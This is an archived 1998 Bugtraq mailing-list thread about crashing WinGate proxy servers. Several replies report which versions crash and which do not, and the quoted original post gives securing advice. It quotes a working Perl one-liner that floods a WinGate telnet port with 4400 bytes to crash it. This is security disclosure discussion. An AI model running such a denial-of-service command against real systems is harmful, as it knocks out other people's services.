[8576] in bugtraq
Re: crashing wingates
daemon@ATHENA.MIT.EDU (Kotu Srinivasa Reddy)
Mon Nov 16 22:59:10 1998
Date: Tue, 17 Nov 1998 01:05:27 +0530
Reply-To: kotu@cyberspace.org
From: Kotu Srinivasa Reddy <kotu@CYBERSPACE.ORG>
X-To: dolittle@israelmail.com
To: BUGTRAQ@NETSPACE.ORG
This is a multi-part message in MIME format.
--------------7C027181AD7A66528D2317BC
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
I have tested the C program received through bugtraq and have tested it
on Wingate 2.1d and i had run the program more than once to crash it.
Wingate stopped responding but the OS was stable.
Noam Rathaus wrote:
>
> Hi,
>
> I have to report that WinGate 2.1 seems to be unaffected.
>
> G23 wrote:
> >
> > Hello,
> >
> > The following one-liner will crash an open Wingate.
> >
> > perl -MIO::Socket -e \
> > 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> > ->send("X" x 4400 . "\n",0)'
> >
> > Unfortunately I don't have access to one that I can test,
> > so I am unable to verify what versions are vulnerable.
> > The above is my rendition of a 44 line sh script written
> > by "rEWTED" (kefka@infected.org).
> >
> > Anyone configuring a proxy for LAN use should only bind to an internal
> > interface anyway. (IE, kidz shouldn't even see your proxy)
> > http://wingate.net/helppages/wingate2Securing_your_network.html
> >
> > If you do provide telnet proxy for the world, then at least log.
> > http://wingate.net/helppages/wingate2Auditing_and_Logging.html
> >
> > ghost23
> >
> > ____________________________________________________________________
> > Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
>
> --
> Thanks
> Noam Rathaus
> http://members.xoom.com/dolittle
> for Exchange Server Q&A : http://members.xoom.com/dolittle
> PGP Key Fingerprint: 8AC7 62AD 860A 4327 3122 544F 34B6 F3A8 2515 7D02
>
> "and - Change your quote already!" - Al Avi
--------------7C027181AD7A66528D2317BC
Content-Type: text/x-vcard; charset=us-ascii;
name="kotu.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Kotu Srinivasa Reddy
Content-Disposition: attachment;
filename="kotu.vcf"
begin:vcard
n:Srinivasa Reddy;Kotu
x-mozilla-html:FALSE
url:http://i.am/kotu
org:Indian Institute of Technology;Dept. of Mining Engg.
version:2.1
email;internet:kotu@cyberspace.org
title:Student
adr;quoted-printable;quoted-printable:;;A Top, LLR Hall,=0D=0A=
IIT,;Kharagpur;West Bengal;721302;INDIA
fn:Kotu Srinivasa Reddy
end:vcard
--------------7C027181AD7A66528D2317BC--
